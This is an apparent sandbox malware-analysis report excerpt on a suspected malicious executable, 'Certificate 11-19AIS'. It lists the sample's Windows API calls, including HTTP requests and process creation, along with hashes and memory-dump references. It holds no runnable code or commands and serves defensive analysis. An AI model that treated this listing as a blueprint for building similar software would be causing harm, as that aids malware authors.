                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1383977212-1403004172
                                                                              • Opcode ID: 1fa38ad41a954e4b0ca5590361fceafde0db927b3207ed50453a24ecbc1c61a9
                                                                              • Instruction ID: 90f864f1b09bcf2de99f793cab300df6d9e3c9d2e918c4fd479da00913c786c4
                                                                              • Opcode Fuzzy Hash: 1fa38ad41a954e4b0ca5590361fceafde0db927b3207ed50453a24ecbc1c61a9
                                                                              • Instruction Fuzzy Hash: 1521C1B4900204BBDF01ABA0CC86FFEBB75FF49300F004015F56197291EB7D88299B60
                                                                              APIs
                                                                              • GetParent.USER32 ref: 007EBAE3
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 007EBAF8
                                                                              • _wcscmp.LIBCMT ref: 007EBB0A
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007EBB85
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1704125052-3381328864
                                                                              • Opcode ID: 71174c523e73de090d8bc39b72da2ed0689cf5cff152cccead9ab1de7d70e462
                                                                              • Instruction ID: ff9365b4d15ef179e8cf037a35cf45f985c401dd5be4156abc92914d579c37d6
                                                                              • Opcode Fuzzy Hash: 71174c523e73de090d8bc39b72da2ed0689cf5cff152cccead9ab1de7d70e462
                                                                              • Instruction Fuzzy Hash: 631129B6608753FAFA206735EC0BDA73BACEB29724F200022F955E41D5FFADA8214554
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 0080B2D5
                                                                              • CoInitialize.OLE32(00000000), ref: 0080B302
                                                                              • CoUninitialize.OLE32 ref: 0080B30C
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 0080B40C
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 0080B539
                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0080B56D
                                                                              • CoGetObject.OLE32(?,00000000,0083D91C,?), ref: 0080B590
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0080B5A3
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0080B623
                                                                              • VariantClear.OLEAUT32(0083D91C), ref: 0080B633
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2395222682-0
                                                                              • Opcode ID: b0aa68706d8f9ee879b497ba1693734228e4154ad668edc3cc840b7e71f4ad22
                                                                              • Instruction ID: 15157166db87df4ace167f10284facdfeb429a10f341abfaff4180b49cea1886
                                                                              • Opcode Fuzzy Hash: b0aa68706d8f9ee879b497ba1693734228e4154ad668edc3cc840b7e71f4ad22
                                                                              • Instruction Fuzzy Hash: 24C10171608305AFC740DF68C885A6AB7E9FF88708F04495DF98ADB291DB71ED05CB92
                                                                              APIs
                                                                              • __swprintf.LIBCMT ref: 007F67FD
                                                                              • __swprintf.LIBCMT ref: 007F680A
                                                                                • Part of subcall function 007D172B: __woutput_l.LIBCMT ref: 007D1784
                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 007F6834
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 007F6840
                                                                              • LockResource.KERNEL32(00000000), ref: 007F684D
                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 007F686D
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 007F687F
                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 007F688E
                                                                              • LockResource.KERNEL32(?), ref: 007F689A
                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007F68F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                              • String ID:
                                                                              • API String ID: 1433390588-0
                                                                              • Opcode ID: cda4f32e0967c52b9e67b05911a1d6c05283cc9641d673f25a7ddef9ed39836f
                                                                              • Instruction ID: ef1f6aef4b4966e205e3a4fc0d9f83381235bc3f0d034cbb69f5d2c8ff9e9c8d
                                                                              • Opcode Fuzzy Hash: cda4f32e0967c52b9e67b05911a1d6c05283cc9641d673f25a7ddef9ed39836f
                                                                              • Instruction Fuzzy Hash: DD31727190021AEBDB119FA0ED49EBF7BA8FF48380F004829FA16D2250E738D951DB70
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 007F4047
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F405B
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 007F4062
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4071
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 007F4083
                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F409C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F40AE
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F40F3
                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4108
                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4113
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: 3e3132c90f0c7596ea1cd89d9bf0030139f092899e261a7d61d4a9c0ded7adef
                                                                              • Instruction ID: de02a327fe5e0ad3a25df1d683ff6498cf6ce734c447dd0a2a2571ee6d57cf31
                                                                              • Opcode Fuzzy Hash: 3e3132c90f0c7596ea1cd89d9bf0030139f092899e261a7d61d4a9c0ded7adef
                                                                              • Instruction Fuzzy Hash: 0431957150020DAFEB11DF54EC4AB7A77BDBBE4311F108515FA08D6364DB78D9809B62
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 007CB496
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 007CB4A0
                                                                              • SetBkMode.GDI32(?,00000001), ref: 007CB4B5
                                                                              • GetStockObject.GDI32(00000005), ref: 007CB4BD
                                                                              • GetClientRect.USER32(?), ref: 0082DD63
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0082DD7A
                                                                              • GetWindowDC.USER32(?), ref: 0082DD86
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0082DD95
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0082DDA7
                                                                              • GetSysColor.USER32(00000005), ref: 0082DDC5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 3430376129-0
                                                                              • Opcode ID: 4beda6a5c43b3e46046036321bee885291095adf20a0e78b8944fbaee4268bf2
                                                                              • Instruction ID: 0ddfe0a397daaf8180bd87b23c8a059d5da25a66cc5a6f55deb2528a2cd6477a
                                                                              • Opcode Fuzzy Hash: 4beda6a5c43b3e46046036321bee885291095adf20a0e78b8944fbaee4268bf2
                                                                              • Instruction Fuzzy Hash: 4E114C31500745EFDB216BB4FC0AFA97F71FB54325F108A29FA66950E2DB324A91DB20
                                                                              APIs
                                                                              • EnumChildWindows.USER32(?,007ECF50), ref: 007ECE90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumWindows
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 3555792229-1603158881
                                                                              • Opcode ID: a0e8c201b135caf6043f508d6c517e052fd26024755a181c78cea1ae8ca99638
                                                                              • Instruction ID: 11eb89202dd68463894fa585bd459856cc004212b2529d21dd8362992cbbbb38
                                                                              • Opcode Fuzzy Hash: a0e8c201b135caf6043f508d6c517e052fd26024755a181c78cea1ae8ca99638
                                                                              • Instruction Fuzzy Hash: 5291F434601686EACB1ADFA1C486BEAFB74FF08300F508559D949E7141DF38A95BCBE0
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007B30DC
                                                                              • CoUninitialize.OLE32(?,00000000), ref: 007B3181
                                                                              • UnregisterHotKey.USER32(?), ref: 007B32A9
                                                                              • DestroyWindow.USER32(?), ref: 00825079
                                                                              • FreeLibrary.KERNEL32(?), ref: 008250F8
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00825125
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 469580280-3243417748
                                                                              • Opcode ID: c45604314b6c8a02c27713a9ea9a36c3afb8049296f01021a4a8b4d2b444f32a
                                                                              • Instruction ID: 87def0291e950b560ce7bcf22d86a3199aa1b8b0dca850e28ab3a73e6ac2c0c0
                                                                              • Opcode Fuzzy Hash: c45604314b6c8a02c27713a9ea9a36c3afb8049296f01021a4a8b4d2b444f32a
                                                                              • Instruction Fuzzy Hash: 47912A70600616CFC715EF14D899FA9F3A4FF14304F5482A9E50AA7262DF38AEA6CF50
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 007CCC15
                                                                                • Part of subcall function 007CCCCD: GetClientRect.USER32(?,?), ref: 007CCCF6
                                                                                • Part of subcall function 007CCCCD: GetWindowRect.USER32(?,?), ref: 007CCD37
                                                                                • Part of subcall function 007CCCCD: ScreenToClient.USER32(?,?), ref: 007CCD5F
                                                                              • GetDC.USER32 ref: 0082D137
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0082D14A
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0082D158
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0082D16D
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0082D175
                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0082D200
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                              • String ID: U
                                                                              • API String ID: 4009187628-3372436214
                                                                              • Opcode ID: c134881b43e5c11d6f66b80d8af07c1327598c841e06f94b58ab1c9a1dab2e38
                                                                              • Instruction ID: 12b2d43e92865eb6e9e01bbfce48e98c0e5f8cd9b2cb229c21231a8f902a9d87
                                                                              • Opcode Fuzzy Hash: c134881b43e5c11d6f66b80d8af07c1327598c841e06f94b58ab1c9a1dab2e38
                                                                              • Instruction Fuzzy Hash: 9571DE30400308DFCF229F64E885AAA7FB5FF58314F14466EED599A2A6D7348C91DB60
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                                • Part of subcall function 007CB63C: GetCursorPos.USER32(000000FF), ref: 007CB64F
                                                                                • Part of subcall function 007CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
                                                                                • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000001), ref: 007CB691
                                                                                • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000002), ref: 007CB69F
                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0081ED3C
                                                                              • ImageList_EndDrag.COMCTL32 ref: 0081ED42
                                                                              • ReleaseCapture.USER32 ref: 0081ED48
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0081EDF0
                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0081EE03
                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0081EEDC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
• String ID: @GUI_DRAGFILE$@GUI_DROPID
• API String ID: 1924731296-2107944366
• Opcode ID: 763014fc136f633e72b77fc8c7f6c8972b1df7e4bdfe3d6b7555af2b0ff71119
• Instruction ID: 8f1f0f0461ae909a563ca7ab30246ed3acd2a1252c5b7744595b001f27f5e535
• Opcode Fuzzy Hash: 763014fc136f633e72b77fc8c7f6c8972b1df7e4bdfe3d6b7555af2b0ff71119
• Instruction Fuzzy Hash: 54517870208304AFDB14DF24DC9AFAA77E8FF98704F00491DF995962A2DB749994CB52
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008045FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0080462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0080466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00804682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0080468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008046BF
• InternetCloseHandle.WININET(00000000), ref: 00804706
  • Part of subcall function 00805052: GetLastError.KERNEL32(?,?,008043CC,00000000,00000000,00000001), ref: 00805067
Strings
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
• Opcode ID: 8ef1af429deb7726e95c27c1b6cff89c1bc4761a2d4455643f579730aabe9e16
• Instruction ID: 17948e81beb49c293398df648cc3e4720b14e3f23b748b7c92a1c31e63ba6e6a
• Opcode Fuzzy Hash: 8ef1af429deb7726e95c27c1b6cff89c1bc4761a2d4455643f579730aabe9e16
• Instruction Fuzzy Hash: DD419DB1541208BFEB129FA4DC89FBB77ACFF09304F00511AFA15DA181EBB19D448BA4
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,?,0084DC00), ref: 0080B715
• FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0084DC00), ref: 0080B749
• QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0080B8C1
• SysFreeString.OLEAUT32(?), ref: 0080B8EB
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Free$FileLibraryModuleNamePathQueryStringType
• String ID:
• API String ID: 560350794-0
• Opcode ID: f1a33ba2d4e0f9c65a4d5f96b850cb14558b61a498e5bc984d929ecde4817ef8
• Instruction ID: 76b2c1cffa17ef0d9913b5a5de2c523c7592d7e3f3f543d5bf214e35ca203f38
• Opcode Fuzzy Hash: f1a33ba2d4e0f9c65a4d5f96b850cb14558b61a498e5bc984d929ecde4817ef8
• Instruction Fuzzy Hash: A0F11775A00219EFCB44DF94CC88EAEB7B9FF89315F108459F915AB290DB31AE41CB50
APIs
• _memset.LIBCMT ref: 008124F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00812688
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008126AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008126EC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0081270E
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0081286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008128A1
• CloseHandle.KERNEL32(?), ref: 008128D0
• CloseHandle.KERNEL32(?), ref: 00812947
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
• Opcode ID: 35ed17a781a99fe8e75576d77377d94640cad739db83d39b654df4562cfe62d6
• Instruction ID: ecf7151835122fd0583e8d306fe5341cc635dcf80ed0ffbe95e561971518b019
• Opcode Fuzzy Hash: 35ed17a781a99fe8e75576d77377d94640cad739db83d39b654df4562cfe62d6
• Instruction Fuzzy Hash: BBD18D31604240DFCB15EF24C495BAABBE9FF84314F14885DF9999B2A2DB35DC90CB52
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0081B3F4
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: c1fcefb7f3d0a60063e31346eacbea799fad2b0fa8b733a98fe3f0d7c1bad814
• Instruction ID: 4e749457ad13031835694b4ad167b4ae513f1665b44e4277da5efd1b589659ae
• Opcode Fuzzy Hash: c1fcefb7f3d0a60063e31346eacbea799fad2b0fa8b733a98fe3f0d7c1bad814
• Instruction Fuzzy Hash: 34517F30500208BAEF209F689C89BE97BADFF05318F644515F625D62E2D771E9D08A55
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0082DB1B
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0082DB3C
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0082DB51
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0082DB6E
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0082DB95
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,007CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0082DBA0
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0082DBBD
• DestroyIcon.USER32(00000000,?,?,?,?,?,?,007CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0082DBC8
Memory Dump Source
• Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend
• String ID:
• API String ID: 1268354404-0
• Opcode ID: f6acbcb8eb62e356736c9872d329406a2f66fcee6508fbc008d355ac909f7682
• Instruction ID: 164e2c650c11d232370b3ab89ea2b12808d9f312d37dded6c60fde85e4b754b9
• Opcode Fuzzy Hash: f6acbcb8eb62e356736c9872d329406a2f66fcee6508fbc008d355ac909f7682
• Instruction Fuzzy Hash: 5B514470600308EFDB209F68DC96FAA7BB8FB58764F10051CF946E6690D7B4A880DB50
APIs
  • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
  • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007F5FA6,?), ref: 007F6EF1
